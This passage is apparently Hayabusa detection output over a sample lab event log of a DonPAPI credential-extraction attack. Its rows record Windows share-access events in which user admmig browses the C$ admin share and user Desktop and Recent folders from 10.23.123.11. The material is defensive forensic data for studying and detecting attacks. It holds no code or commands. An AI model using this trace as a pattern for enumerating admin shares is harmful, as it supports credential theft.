0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.265 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.268 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.270 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.305 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.370 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.371 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 